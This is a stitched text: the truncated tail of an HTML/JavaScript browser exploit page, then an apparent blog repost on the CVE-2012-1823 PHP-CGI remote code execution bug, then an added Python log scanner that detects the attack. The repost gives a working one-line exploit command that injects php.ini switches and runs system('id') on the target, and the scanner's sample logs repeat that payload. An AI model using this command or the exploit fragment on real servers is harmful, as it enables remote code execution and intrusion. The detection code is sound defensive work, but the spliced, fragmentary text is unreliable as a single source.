formobj.reset();
}
alert('s');
}

</script>
</head>

<body onload='exploit()'>
<form method="post">
   <select id="select1">
</select>
</form>
<object classid="vvv.dll#GenericControl">
</body>
</html>


##eromang



Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823


The CVE-2012-1823 PHP-CGI exploit was, quite possibly, one of the most groundbreaking exploits of 2012. In a year that brought us MS-12-020 (the most hyped bug in my recollection), multiple Java 0day exploits, and several MySQL exploits, the PHP-CGI bug still stands out as one of the most hilariously brilliant bugs to show up, for several reasons, primarily the massive misunderstanding of how it worked.

For this exploit to work, PHP had to be running in CGI mode, a fairly obscure configuration not seen all too often in the wild. Essentially, with this vulnerability, you could inject arguments into the PHP-CGI binary and change php.ini directives, allowing for remote code execution.

Developing an exploit for this bug is trivial. In order to gain remote code execution, you set php.ini to allow URL inclusion (allow_url_include = 1) and to automatically prepend the "file" php://input. This means whatever we send in the POST request is parsed as PHP and executed.

One way to exploit this (targeting example.com), using lwp-request's "POST" utility, is as follows.
echo "<?php system('id');die(); ?>" | POST "http://example.com/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

As you will see in the video, we can easily use this to execute commands remotely from a BASH shell.

read more and view video.............http://insecurety.net/?p=705
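As an added detection example (my code, not from the insecurety.net post, in Python rather than the PHP the bug lives in), the following scans constructed web-server log lines for the argument-injection pattern described above: a query string that URL-decodes to php-cgi switches, with the two php.ini directives the post uses flagged as RCE indicators. It generalises the "-d" case to any leading switch, since the bug hands whatever follows "?-" to the binary; the common log format and sample addresses are assumptions.

```python
# Added example, not code from the post: flag CVE-2012-1823-style php-cgi
# argument injection in access logs. The query string is URL-decoded and
# checked for a leading php-cgi switch (the post shows "-d"; any switch is
# injectable, so "-<letter>" is flagged) and for the two directives the post
# uses. Log lines are constructed samples in common log format.
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)')
SWITCH_RE = re.compile(r'^-[A-Za-z]')   # decoded query starts with a switch
RCE_DIRECTIVES = {"allow_url_include", "auto_prepend_file"}  # POST body -> PHP

SAMPLE_LOG = [  # constructed sample lines (RFC 5737 documentation addresses)
    '203.0.113.7 - - [27/Dec/2012:10:01:02 +0000] "POST /?-d+allow_url_include'
    '%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512',
    '198.51.100.4 - - [27/Dec/2012:10:01:05 +0000] "GET /index.php?page=about '
    'HTTP/1.1" 200 2048',
    '203.0.113.7 - - [27/Dec/2012:10:01:09 +0000] "GET /cgi-bin/php?-s '
    'HTTP/1.1" 200 1337',
]

def analyze_target(target):
    """Parsed switches/directives if the request target looks injected, else None."""
    path, _, query = target.partition("?")
    decoded = unquote_plus(query)          # "+" -> space, "%3d" -> "="
    if not SWITCH_RE.match(decoded):
        return None
    tokens = decoded.split()
    directives = {}
    for i, tok in enumerate(tokens):
        if tok == "-d" and i + 1 < len(tokens):        # "-d name=value"
            name, _, value = tokens[i + 1].partition("=")
            directives[name] = value
        elif tok.startswith("-d") and len(tok) > 2:    # "-dname=value"
            name, _, value = tok[2:].partition("=")
            directives[name] = value
    return {
        "path": path,
        "switches": sorted({t[:2] for t in tokens if t.startswith("-")}),
        "directives": directives,
        "rce_indicators": sorted(d for d in directives if d in RCE_DIRECTIVES),
    }

def scan_log(lines):
    """One hit dict (log fields plus analysis) per flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        found = analyze_target(m.group("target")) if m else None
        if found:
            hits.append({**m.groupdict(), **found})
    return hits
```

Running scan_log(SAMPLE_LOG) flags the two injected requests and leaves the ordinary index.php request alone.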